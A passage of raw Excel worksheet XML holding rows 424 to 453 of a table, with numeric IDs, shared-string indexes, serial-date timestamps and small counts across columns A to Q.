      <c r="Q423" s="3"/>
    </row>
    <row r="424" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A424" s="3">
        <v>215153</v>
      </c>
      <c r="B424" s="3" t="s">
        <v>356</v>
      </c>
      <c r="C424" s="9" t="s">
        <v>2995</v>
      </c>
      <c r="D424" s="9" t="s">
        <v>2996</v>
      </c>
      <c r="E424" s="9">
        <v>22656</v>
      </c>
      <c r="F424" s="9" t="s">
        <v>2997</v>
      </c>
      <c r="G424" s="10">
        <v>41277.618750000001</v>
      </c>
      <c r="H424" s="9">
        <v>45382</v>
      </c>
      <c r="I424" s="9" t="s">
        <v>2998</v>
      </c>
      <c r="J424" s="10">
        <v>41277.613888888889</v>
      </c>
      <c r="K424" s="3" t="s">
        <v>357</v>
      </c>
      <c r="L424" s="4">
        <v>3</v>
      </c>
      <c r="M424" s="4">
        <v>1</v>
      </c>
      <c r="N424" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O424" s="3"/>
      <c r="P424" s="3"/>
      <c r="Q424" s="3"/>
    </row>
    <row r="425" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A425" s="3">
        <v>215244</v>
      </c>
      <c r="B425" s="5" t="s">
        <v>358</v>
      </c>
      <c r="C425" s="9" t="s">
        <v>2999</v>
      </c>
      <c r="D425" s="9" t="s">
        <v>3000</v>
      </c>
      <c r="E425" s="9">
        <v>18771</v>
      </c>
      <c r="F425" s="9" t="s">
        <v>791</v>
      </c>
      <c r="G425" s="10">
        <v>39745.615277777775</v>
      </c>
      <c r="H425" s="9">
        <v>18771</v>
      </c>
      <c r="I425" s="9" t="s">
        <v>791</v>
      </c>
      <c r="J425" s="10">
        <v>39745.613194444442</v>
      </c>
      <c r="K425" s="3" t="s">
        <v>359</v>
      </c>
      <c r="L425" s="4">
        <v>9</v>
      </c>
      <c r="M425" s="4">
        <v>5</v>
      </c>
      <c r="N425" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O425" s="3" t="s">
        <v>701</v>
      </c>
      <c r="P425" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q425" s="3"/>
    </row>
    <row r="426" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A426" s="3">
        <v>215422</v>
      </c>
      <c r="B426" s="3" t="s">
        <v>360</v>
      </c>
      <c r="C426" s="9" t="s">
        <v>3001</v>
      </c>
      <c r="D426" s="9" t="s">
        <v>3002</v>
      </c>
      <c r="E426" s="9">
        <v>22656</v>
      </c>
      <c r="F426" s="9" t="s">
        <v>2997</v>
      </c>
      <c r="G426" s="10">
        <v>41640.448611111111</v>
      </c>
      <c r="H426" s="9">
        <v>1562548</v>
      </c>
      <c r="I426" s="9" t="s">
        <v>3003</v>
      </c>
      <c r="J426" s="10">
        <v>41640.444444444445</v>
      </c>
      <c r="K426" s="3" t="s">
        <v>361</v>
      </c>
      <c r="L426" s="4">
        <v>8</v>
      </c>
      <c r="M426" s="4">
        <v>6</v>
      </c>
      <c r="N426" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O426" s="3"/>
      <c r="P426" s="3"/>
      <c r="Q426" s="3"/>
    </row>
    <row r="427" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A427" s="3">
        <v>215462</v>
      </c>
      <c r="B427" s="3" t="s">
        <v>384</v>
      </c>
      <c r="C427" s="9" t="s">
        <v>3004</v>
      </c>
      <c r="D427" s="9" t="s">
        <v>3005</v>
      </c>
      <c r="E427" s="9">
        <v>488657</v>
      </c>
      <c r="F427" s="9" t="s">
        <v>3006</v>
      </c>
      <c r="G427" s="10">
        <v>41303.368750000001</v>
      </c>
      <c r="H427" s="9">
        <v>488657</v>
      </c>
      <c r="I427" s="9" t="s">
        <v>3006</v>
      </c>
      <c r="J427" s="10">
        <v>41303.365972222222</v>
      </c>
      <c r="K427" s="3" t="s">
        <v>385</v>
      </c>
      <c r="L427" s="4">
        <v>3</v>
      </c>
      <c r="M427" s="4">
        <v>1</v>
      </c>
      <c r="N427" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O427" s="3"/>
      <c r="P427" s="3"/>
      <c r="Q427" s="3"/>
    </row>
    <row r="428" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A428" s="3">
        <v>215505</v>
      </c>
      <c r="B428" s="3" t="s">
        <v>386</v>
      </c>
      <c r="C428" s="9" t="s">
        <v>3007</v>
      </c>
      <c r="D428" s="9" t="s">
        <v>3008</v>
      </c>
      <c r="E428" s="9">
        <v>1350899</v>
      </c>
      <c r="F428" s="9" t="s">
        <v>3009</v>
      </c>
      <c r="G428" s="10">
        <v>41374.456250000003</v>
      </c>
      <c r="H428" s="9">
        <v>2067316</v>
      </c>
      <c r="I428" s="9" t="s">
        <v>3010</v>
      </c>
      <c r="J428" s="10">
        <v>41374.45208333333</v>
      </c>
      <c r="K428" s="3" t="s">
        <v>387</v>
      </c>
      <c r="L428" s="4">
        <v>6</v>
      </c>
      <c r="M428" s="4">
        <v>4</v>
      </c>
      <c r="N428" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O428" s="3"/>
      <c r="P428" s="3"/>
      <c r="Q428" s="3"/>
    </row>
    <row r="429" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A429" s="9">
        <v>215718</v>
      </c>
      <c r="B429" s="9" t="s">
        <v>1214</v>
      </c>
      <c r="C429" s="9" t="s">
        <v>3011</v>
      </c>
      <c r="D429" s="9" t="s">
        <v>3012</v>
      </c>
      <c r="E429" s="9">
        <v>3410</v>
      </c>
      <c r="F429" s="9" t="s">
        <v>3013</v>
      </c>
      <c r="G429" s="10">
        <v>42031.470138888886</v>
      </c>
      <c r="H429" s="9">
        <v>321731</v>
      </c>
      <c r="I429" s="9" t="s">
        <v>2360</v>
      </c>
      <c r="J429" s="10">
        <v>42031.410416666666</v>
      </c>
      <c r="K429" s="9" t="s">
        <v>1215</v>
      </c>
      <c r="L429" s="7">
        <v>5</v>
      </c>
      <c r="M429" s="7">
        <v>3</v>
      </c>
      <c r="Q429" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="430" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A430" s="3">
        <v>215731</v>
      </c>
      <c r="B430" s="3" t="s">
        <v>388</v>
      </c>
      <c r="C430" s="9" t="s">
        <v>3014</v>
      </c>
      <c r="D430" s="9" t="s">
        <v>3015</v>
      </c>
      <c r="E430" s="9">
        <v>893</v>
      </c>
      <c r="F430" s="9" t="s">
        <v>2109</v>
      </c>
      <c r="G430" s="10">
        <v>42250.80972222222</v>
      </c>
      <c r="H430" s="9">
        <v>1015495</v>
      </c>
      <c r="I430" s="9" t="s">
        <v>3016</v>
      </c>
      <c r="J430" s="10">
        <v>42250.673611111109</v>
      </c>
      <c r="K430" s="3" t="s">
        <v>389</v>
      </c>
      <c r="L430" s="4">
        <v>4</v>
      </c>
      <c r="M430" s="4">
        <v>2</v>
      </c>
      <c r="N430" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O430" s="3"/>
      <c r="P430" s="3"/>
      <c r="Q430" s="3"/>
    </row>
    <row r="431" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A431" s="3">
        <v>216075</v>
      </c>
      <c r="B431" s="3" t="s">
        <v>390</v>
      </c>
      <c r="C431" s="9" t="s">
        <v>3017</v>
      </c>
      <c r="D431" s="9" t="s">
        <v>3018</v>
      </c>
      <c r="E431" s="9">
        <v>1398</v>
      </c>
      <c r="F431" s="9" t="s">
        <v>3019</v>
      </c>
      <c r="G431" s="10">
        <v>39743.576388888891</v>
      </c>
      <c r="H431" s="9">
        <v>1398</v>
      </c>
      <c r="I431" s="9" t="s">
        <v>3019</v>
      </c>
      <c r="J431" s="10">
        <v>39743.575694444444</v>
      </c>
      <c r="K431" s="3" t="s">
        <v>391</v>
      </c>
      <c r="L431" s="4">
        <v>3</v>
      </c>
      <c r="M431" s="4">
        <v>1</v>
      </c>
      <c r="N431" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O431" s="3"/>
      <c r="P431" s="3"/>
      <c r="Q431" s="3"/>
    </row>
    <row r="432" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A432" s="3">
        <v>216214</v>
      </c>
      <c r="B432" s="3" t="s">
        <v>392</v>
      </c>
      <c r="C432" s="9" t="s">
        <v>3020</v>
      </c>
      <c r="D432" s="9" t="s">
        <v>3021</v>
      </c>
      <c r="E432" s="9">
        <v>18771</v>
      </c>
      <c r="F432" s="9" t="s">
        <v>791</v>
      </c>
      <c r="G432" s="10">
        <v>39740.517361111109</v>
      </c>
      <c r="H432" s="9">
        <v>1450</v>
      </c>
      <c r="I432" s="9" t="s">
        <v>3022</v>
      </c>
      <c r="J432" s="10">
        <v>39740.411805555559</v>
      </c>
      <c r="K432" s="3" t="s">
        <v>393</v>
      </c>
      <c r="L432" s="4">
        <v>4</v>
      </c>
      <c r="M432" s="4">
        <v>2</v>
      </c>
      <c r="N432" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O432" s="3"/>
      <c r="P432" s="3"/>
      <c r="Q432" s="3"/>
    </row>
    <row r="433" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A433" s="3">
        <v>216266</v>
      </c>
      <c r="B433" s="3" t="s">
        <v>394</v>
      </c>
      <c r="C433" s="9" t="s">
        <v>3023</v>
      </c>
      <c r="D433" s="9" t="s">
        <v>3024</v>
      </c>
      <c r="E433" s="9">
        <v>1968</v>
      </c>
      <c r="F433" s="9" t="s">
        <v>1868</v>
      </c>
      <c r="G433" s="10">
        <v>41764.961111111108</v>
      </c>
      <c r="H433" s="9">
        <v>319876</v>
      </c>
      <c r="I433" s="9" t="s">
        <v>3025</v>
      </c>
      <c r="J433" s="10">
        <v>41763.815972222219</v>
      </c>
      <c r="K433" s="3" t="s">
        <v>395</v>
      </c>
      <c r="L433" s="4">
        <v>4</v>
      </c>
      <c r="M433" s="4">
        <v>2</v>
      </c>
      <c r="N433" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O433" s="3"/>
      <c r="P433" s="3"/>
      <c r="Q433" s="3"/>
    </row>
    <row r="434" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A434" s="9">
        <v>216601</v>
      </c>
      <c r="B434" s="9" t="s">
        <v>1216</v>
      </c>
      <c r="C434" s="9" t="s">
        <v>3026</v>
      </c>
      <c r="D434" s="9" t="s">
        <v>3027</v>
      </c>
      <c r="E434" s="9">
        <v>5640</v>
      </c>
      <c r="F434" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="G434" s="10">
        <v>39875.926388888889</v>
      </c>
      <c r="H434" s="9">
        <v>6521</v>
      </c>
      <c r="I434" s="9" t="s">
        <v>3028</v>
      </c>
      <c r="J434" s="10">
        <v>39875.871527777781</v>
      </c>
      <c r="K434" s="9" t="s">
        <v>1217</v>
      </c>
      <c r="L434" s="7">
        <v>4</v>
      </c>
      <c r="M434" s="7">
        <v>2</v>
      </c>
      <c r="P434" s="9" t="s">
        <v>715</v>
      </c>
      <c r="Q434" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="435" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A435" s="9">
        <v>216972</v>
      </c>
      <c r="B435" s="9" t="s">
        <v>1218</v>
      </c>
      <c r="C435" s="9" t="s">
        <v>3029</v>
      </c>
      <c r="D435" s="9" t="s">
        <v>3030</v>
      </c>
      <c r="E435" s="9">
        <v>3560</v>
      </c>
      <c r="F435" s="9" t="s">
        <v>2046</v>
      </c>
      <c r="G435" s="10">
        <v>39740.929861111108</v>
      </c>
      <c r="H435" s="9">
        <v>6899</v>
      </c>
      <c r="I435" s="9" t="s">
        <v>2302</v>
      </c>
      <c r="J435" s="10">
        <v>39740.923611111109</v>
      </c>
      <c r="K435" s="9" t="s">
        <v>1219</v>
      </c>
      <c r="L435" s="7">
        <v>4</v>
      </c>
      <c r="M435" s="7">
        <v>2</v>
      </c>
      <c r="N435" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="436" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A436" s="3">
        <v>217605</v>
      </c>
      <c r="B436" s="3" t="s">
        <v>446</v>
      </c>
      <c r="C436" s="9" t="s">
        <v>3031</v>
      </c>
      <c r="D436" s="9" t="s">
        <v>3032</v>
      </c>
      <c r="E436" s="9">
        <v>3919155</v>
      </c>
      <c r="F436" s="9" t="s">
        <v>3033</v>
      </c>
      <c r="G436" s="10">
        <v>42934.865972222222</v>
      </c>
      <c r="H436" s="9">
        <v>13430</v>
      </c>
      <c r="I436" s="9" t="s">
        <v>3034</v>
      </c>
      <c r="J436" s="10">
        <v>42926.482638888891</v>
      </c>
      <c r="K436" s="3" t="s">
        <v>447</v>
      </c>
      <c r="L436" s="4">
        <v>10</v>
      </c>
      <c r="M436" s="4">
        <v>8</v>
      </c>
      <c r="N436" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O436" s="3"/>
      <c r="P436" s="3"/>
      <c r="Q436" s="3"/>
    </row>
    <row r="437" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A437" s="9">
        <v>218150</v>
      </c>
      <c r="B437" s="9" t="s">
        <v>1220</v>
      </c>
      <c r="C437" s="9" t="s">
        <v>3035</v>
      </c>
      <c r="D437" s="9" t="s">
        <v>3036</v>
      </c>
      <c r="E437" s="9">
        <v>707111</v>
      </c>
      <c r="F437" s="9" t="s">
        <v>2481</v>
      </c>
      <c r="G437" s="10">
        <v>41613.182638888888</v>
      </c>
      <c r="H437" s="9">
        <v>707111</v>
      </c>
      <c r="I437" s="9" t="s">
        <v>2481</v>
      </c>
      <c r="J437" s="10">
        <v>41613.181944444441</v>
      </c>
      <c r="K437" s="9" t="s">
        <v>1221</v>
      </c>
      <c r="L437" s="7">
        <v>4</v>
      </c>
      <c r="M437" s="7">
        <v>1</v>
      </c>
      <c r="N437" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="438" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A438" s="3">
        <v>218390</v>
      </c>
      <c r="B438" s="3" t="s">
        <v>454</v>
      </c>
      <c r="C438" s="9" t="s">
        <v>3037</v>
      </c>
      <c r="D438" s="9" t="s">
        <v>3038</v>
      </c>
      <c r="E438" s="9">
        <v>1288</v>
      </c>
      <c r="F438" s="9" t="s">
        <v>794</v>
      </c>
      <c r="G438" s="10">
        <v>42557.962500000001</v>
      </c>
      <c r="H438" s="9">
        <v>57171</v>
      </c>
      <c r="I438" s="9" t="s">
        <v>3039</v>
      </c>
      <c r="J438" s="10">
        <v>42557.943749999999</v>
      </c>
      <c r="K438" s="3" t="s">
        <v>455</v>
      </c>
      <c r="L438" s="4">
        <v>6</v>
      </c>
      <c r="M438" s="4">
        <v>4</v>
      </c>
      <c r="N438" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O438" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P438" s="3"/>
      <c r="Q438" s="3"/>
    </row>
    <row r="439" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A439" s="3">
        <v>218408</v>
      </c>
      <c r="B439" s="3" t="s">
        <v>456</v>
      </c>
      <c r="C439" s="9" t="s">
        <v>3040</v>
      </c>
      <c r="D439" s="9" t="s">
        <v>3041</v>
      </c>
      <c r="E439" s="9">
        <v>17440</v>
      </c>
      <c r="F439" s="9" t="s">
        <v>3042</v>
      </c>
      <c r="G439" s="10">
        <v>42595.343055555553</v>
      </c>
      <c r="H439" s="9">
        <v>3739391</v>
      </c>
      <c r="I439" s="9" t="s">
        <v>3043</v>
      </c>
      <c r="J439" s="10">
        <v>42594.785416666666</v>
      </c>
      <c r="K439" s="3" t="s">
        <v>457</v>
      </c>
      <c r="L439" s="4">
        <v>3</v>
      </c>
      <c r="M439" s="4">
        <v>1</v>
      </c>
      <c r="N439" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O439" s="3"/>
      <c r="P439" s="3"/>
      <c r="Q439" s="3"/>
    </row>
    <row r="440" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A440" s="3">
        <v>218419</v>
      </c>
      <c r="B440" s="3" t="s">
        <v>458</v>
      </c>
      <c r="C440" s="9" t="s">
        <v>3044</v>
      </c>
      <c r="D440" s="9" t="s">
        <v>3045</v>
      </c>
      <c r="E440" s="9">
        <v>8155</v>
      </c>
      <c r="F440" s="9" t="s">
        <v>2929</v>
      </c>
      <c r="G440" s="10">
        <v>43437.519444444442</v>
      </c>
      <c r="H440" s="9">
        <v>477420</v>
      </c>
      <c r="I440" s="9" t="s">
        <v>3046</v>
      </c>
      <c r="J440" s="10">
        <v>43437.209027777775</v>
      </c>
      <c r="K440" s="3" t="s">
        <v>459</v>
      </c>
      <c r="L440" s="4">
        <v>6</v>
      </c>
      <c r="M440" s="4">
        <v>2</v>
      </c>
      <c r="N440" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O440" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P440" s="3"/>
      <c r="Q440" s="3"/>
    </row>
    <row r="441" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A441" s="3">
        <v>218437</v>
      </c>
      <c r="B441" s="3" t="s">
        <v>460</v>
      </c>
      <c r="C441" s="9" t="s">
        <v>3047</v>
      </c>
      <c r="D441" s="9" t="s">
        <v>3048</v>
      </c>
      <c r="E441" s="9">
        <v>9021</v>
      </c>
      <c r="F441" s="9" t="s">
        <v>2281</v>
      </c>
      <c r="G441" s="10">
        <v>42733.402777777781</v>
      </c>
      <c r="H441" s="9">
        <v>6583140</v>
      </c>
      <c r="I441" s="9" t="s">
        <v>3049</v>
      </c>
      <c r="J441" s="10">
        <v>42725.711111111108</v>
      </c>
      <c r="K441" s="3" t="s">
        <v>461</v>
      </c>
      <c r="L441" s="4">
        <v>3</v>
      </c>
      <c r="M441" s="4">
        <v>1</v>
      </c>
      <c r="N441" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O441" s="3"/>
      <c r="P441" s="3"/>
      <c r="Q441" s="3"/>
    </row>
    <row r="442" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A442" s="3">
        <v>218510</v>
      </c>
      <c r="B442" s="3" t="s">
        <v>462</v>
      </c>
      <c r="C442" s="9" t="s">
        <v>3050</v>
      </c>
      <c r="D442" s="9" t="s">
        <v>3051</v>
      </c>
      <c r="E442" s="9">
        <v>635608</v>
      </c>
      <c r="F442" s="9" t="s">
        <v>3052</v>
      </c>
      <c r="G442" s="10">
        <v>43613.378472222219</v>
      </c>
      <c r="H442" s="9">
        <v>3149444</v>
      </c>
      <c r="I442" s="9" t="s">
        <v>3053</v>
      </c>
      <c r="J442" s="10">
        <v>43611.943055555559</v>
      </c>
      <c r="K442" s="3" t="s">
        <v>463</v>
      </c>
      <c r="L442" s="4">
        <v>19</v>
      </c>
      <c r="M442" s="4">
        <v>17</v>
      </c>
      <c r="N442" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O442" s="3"/>
      <c r="P442" s="3"/>
      <c r="Q442" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="443" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A443" s="3">
        <v>219605</v>
      </c>
      <c r="B443" s="3" t="s">
        <v>500</v>
      </c>
      <c r="C443" s="9" t="s">
        <v>3054</v>
      </c>
      <c r="D443" s="9" t="s">
        <v>3055</v>
      </c>
      <c r="E443" s="9">
        <v>426671</v>
      </c>
      <c r="F443" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G443" s="10">
        <v>41529.553472222222</v>
      </c>
      <c r="H443" s="9">
        <v>2063547</v>
      </c>
      <c r="I443" s="9" t="s">
        <v>2827</v>
      </c>
      <c r="J443" s="10">
        <v>41529.54791666667</v>
      </c>
      <c r="K443" s="3" t="s">
        <v>501</v>
      </c>
      <c r="L443" s="4">
        <v>4</v>
      </c>
      <c r="M443" s="4">
        <v>2</v>
      </c>
      <c r="N443" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O443" s="3"/>
      <c r="P443" s="3"/>
      <c r="Q443" s="3"/>
    </row>
    <row r="444" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A444" s="3">
        <v>219801</v>
      </c>
      <c r="B444" s="3" t="s">
        <v>502</v>
      </c>
      <c r="C444" s="9" t="s">
        <v>3056</v>
      </c>
      <c r="D444" s="9" t="s">
        <v>3057</v>
      </c>
      <c r="E444" s="9">
        <v>20774</v>
      </c>
      <c r="F444" s="9" t="s">
        <v>3058</v>
      </c>
      <c r="G444" s="10">
        <v>41051.847916666666</v>
      </c>
      <c r="H444" s="9">
        <v>20774</v>
      </c>
      <c r="I444" s="9" t="s">
        <v>3058</v>
      </c>
      <c r="J444" s="10">
        <v>41051.847916666666</v>
      </c>
      <c r="K444" s="3" t="s">
        <v>503</v>
      </c>
      <c r="L444" s="4">
        <v>4</v>
      </c>
      <c r="M444" s="4">
        <v>2</v>
      </c>
      <c r="N444" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O444" s="3"/>
      <c r="P444" s="3"/>
      <c r="Q444" s="3"/>
    </row>
    <row r="445" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A445" s="3">
        <v>219855</v>
      </c>
      <c r="B445" s="3" t="s">
        <v>504</v>
      </c>
      <c r="C445" s="9" t="s">
        <v>3059</v>
      </c>
      <c r="D445" s="9" t="s">
        <v>3060</v>
      </c>
      <c r="E445" s="9">
        <v>12971</v>
      </c>
      <c r="F445" s="9" t="s">
        <v>3061</v>
      </c>
      <c r="G445" s="10">
        <v>40337.765277777777</v>
      </c>
      <c r="H445" s="9">
        <v>145287</v>
      </c>
      <c r="I445" s="9" t="s">
        <v>3062</v>
      </c>
      <c r="J445" s="10">
        <v>40336.476388888892</v>
      </c>
      <c r="K445" s="3" t="s">
        <v>505</v>
      </c>
      <c r="L445" s="4">
        <v>3</v>
      </c>
      <c r="M445" s="4">
        <v>1</v>
      </c>
      <c r="N445" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O445" s="3"/>
      <c r="P445" s="3"/>
      <c r="Q445" s="3"/>
    </row>
    <row r="446" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A446" s="3">
        <v>219891</v>
      </c>
      <c r="B446" s="3" t="s">
        <v>506</v>
      </c>
      <c r="C446" s="9" t="s">
        <v>3063</v>
      </c>
      <c r="D446" s="9" t="s">
        <v>3064</v>
      </c>
      <c r="E446" s="9">
        <v>3474</v>
      </c>
      <c r="F446" s="9" t="s">
        <v>1963</v>
      </c>
      <c r="G446" s="10">
        <v>40052.644444444442</v>
      </c>
      <c r="H446" s="9">
        <v>3474</v>
      </c>
      <c r="I446" s="9" t="s">
        <v>1963</v>
      </c>
      <c r="J446" s="10">
        <v>39741.929166666669</v>
      </c>
      <c r="K446" s="3" t="s">
        <v>507</v>
      </c>
      <c r="L446" s="4">
        <v>3</v>
      </c>
      <c r="M446" s="4">
        <v>1</v>
      </c>
      <c r="N446" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O446" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P446" s="3"/>
      <c r="Q446" s="3"/>
    </row>
    <row r="447" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A447" s="3">
        <v>219998</v>
      </c>
      <c r="B447" s="3" t="s">
        <v>508</v>
      </c>
      <c r="C447" s="9" t="s">
        <v>3065</v>
      </c>
      <c r="D447" s="9" t="s">
        <v>3066</v>
      </c>
      <c r="E447" s="9">
        <v>3474</v>
      </c>
      <c r="F447" s="9" t="s">
        <v>1963</v>
      </c>
      <c r="G447" s="10">
        <v>42495.769444444442</v>
      </c>
      <c r="H447" s="9">
        <v>138304</v>
      </c>
      <c r="I447" s="9" t="s">
        <v>3067</v>
      </c>
      <c r="J447" s="10">
        <v>41387.65902777778</v>
      </c>
      <c r="K447" s="3" t="s">
        <v>509</v>
      </c>
      <c r="L447" s="4">
        <v>5</v>
      </c>
      <c r="M447" s="4">
        <v>3</v>
      </c>
      <c r="N447" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O447" s="3"/>
      <c r="P447" s="3"/>
      <c r="Q447" s="3"/>
    </row>
    <row r="448" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A448" s="9">
        <v>220423</v>
      </c>
      <c r="B448" s="9" t="s">
        <v>1222</v>
      </c>
      <c r="C448" s="9" t="s">
        <v>3068</v>
      </c>
      <c r="D448" s="9" t="s">
        <v>3069</v>
      </c>
      <c r="E448" s="9">
        <v>13</v>
      </c>
      <c r="F448" s="9" t="s">
        <v>1619</v>
      </c>
      <c r="G448" s="10">
        <v>39742.036805555559</v>
      </c>
      <c r="H448" s="9">
        <v>2134</v>
      </c>
      <c r="I448" s="9" t="s">
        <v>1710</v>
      </c>
      <c r="J448" s="10">
        <v>39742.03402777778</v>
      </c>
      <c r="K448" s="9" t="s">
        <v>1223</v>
      </c>
      <c r="L448" s="7">
        <v>3</v>
      </c>
      <c r="M448" s="7">
        <v>1</v>
      </c>
      <c r="N448" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="449" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A449" s="3">
        <v>220991</v>
      </c>
      <c r="B449" s="3" t="s">
        <v>554</v>
      </c>
      <c r="C449" s="9" t="s">
        <v>3070</v>
      </c>
      <c r="D449" s="9" t="s">
        <v>3071</v>
      </c>
      <c r="E449" s="9">
        <v>6461</v>
      </c>
      <c r="F449" s="9" t="s">
        <v>3072</v>
      </c>
      <c r="G449" s="10">
        <v>39742.332638888889</v>
      </c>
      <c r="H449" s="9">
        <v>6461</v>
      </c>
      <c r="I449" s="9" t="s">
        <v>3072</v>
      </c>
      <c r="J449" s="10">
        <v>39742.281944444447</v>
      </c>
      <c r="K449" s="3" t="s">
        <v>555</v>
      </c>
      <c r="L449" s="4">
        <v>2</v>
      </c>
      <c r="M449" s="4">
        <v>1</v>
      </c>
      <c r="N449" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O449" s="3"/>
      <c r="P449" s="3"/>
      <c r="Q449" s="3"/>
    </row>
    <row r="450" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A450" s="9">
        <v>221079</v>
      </c>
      <c r="B450" s="9" t="s">
        <v>1224</v>
      </c>
      <c r="C450" s="9" t="s">
        <v>3073</v>
      </c>
      <c r="D450" s="9" t="s">
        <v>3074</v>
      </c>
      <c r="E450" s="9">
        <v>26066</v>
      </c>
      <c r="F450" s="9" t="s">
        <v>3075</v>
      </c>
      <c r="G450" s="10">
        <v>43243.788194444445</v>
      </c>
      <c r="H450" s="9">
        <v>5321363</v>
      </c>
      <c r="I450" s="9" t="s">
        <v>3076</v>
      </c>
      <c r="J450" s="10">
        <v>43230.914583333331</v>
      </c>
      <c r="K450" s="9" t="s">
        <v>1225</v>
      </c>
      <c r="L450" s="7">
        <v>3</v>
      </c>
      <c r="M450" s="7">
        <v>1</v>
      </c>
      <c r="N450" s="9" t="s">
        <v>704</v>
      </c>
      <c r="O450" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="451" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A451" s="3">
        <v>221257</v>
      </c>
      <c r="B451" s="3" t="s">
        <v>556</v>
      </c>
      <c r="C451" s="9" t="s">
        <v>3077</v>
      </c>
      <c r="D451" s="9" t="s">
        <v>3078</v>
      </c>
      <c r="E451" s="9">
        <v>23744</v>
      </c>
      <c r="F451" s="9" t="s">
        <v>3079</v>
      </c>
      <c r="G451" s="10">
        <v>43199.865972222222</v>
      </c>
      <c r="H451" s="9">
        <v>9449102</v>
      </c>
      <c r="I451" s="9" t="s">
        <v>3080</v>
      </c>
      <c r="J451" s="10">
        <v>43199.712500000001</v>
      </c>
      <c r="K451" s="3" t="s">
        <v>557</v>
      </c>
      <c r="L451" s="4">
        <v>4</v>
      </c>
      <c r="M451" s="4">
        <v>2</v>
      </c>
      <c r="N451" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O451" s="3"/>
      <c r="P451" s="3"/>
      <c r="Q451" s="3"/>
    </row>
    <row r="452" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A452" s="9">
        <v>221892</v>
      </c>
      <c r="B452" s="9" t="s">
        <v>1226</v>
      </c>
      <c r="C452" s="9" t="s">
        <v>3081</v>
      </c>
      <c r="D452" s="9" t="s">
        <v>3082</v>
      </c>
      <c r="E452" s="9">
        <v>17712</v>
      </c>
      <c r="F452" s="9" t="s">
        <v>3083</v>
      </c>
      <c r="G452" s="10">
        <v>41005.75</v>
      </c>
      <c r="H452" s="9">
        <v>260894</v>
      </c>
      <c r="I452" s="9" t="s">
        <v>3084</v>
      </c>
      <c r="J452" s="10">
        <v>41003.976388888892</v>
      </c>
      <c r="K452" s="9" t="s">
        <v>1227</v>
      </c>
      <c r="L452" s="7">
        <v>3</v>
      </c>
      <c r="M452" s="7">
        <v>1</v>
      </c>
      <c r="N452" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="453" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A453" s="9">
        <v>222030</v>
      </c>
      <c r="B453" s="9" t="s">
        <v>1228</v>
      </c>
      <c r="C453" s="9" t="s">
        <v>3085</v>
      </c>
      <c r="D453" s="9" t="s">
        <v>3086</v>
      </c>
      <c r="E453" s="9">
        <v>357</v>
      </c>
      <c r="F453" s="9" t="s">
        <v>3087</v>
      </c>
      <c r="G453" s="10">
        <v>39743.54791666667</v>
      </c>
      <c r="H453" s="9">
        <v>13913</v>
      </c>
      <c r="I453" s="9" t="s">
        <v>2821</v>
      </c>
      <c r="J453" s="10">
        <v>39743.542361111111</v>
      </c>
      <c r="K453" s="9" t="s">
        <v>1229</v>
      </c>
      <c r="L453" s="7">
        <v>6</v>
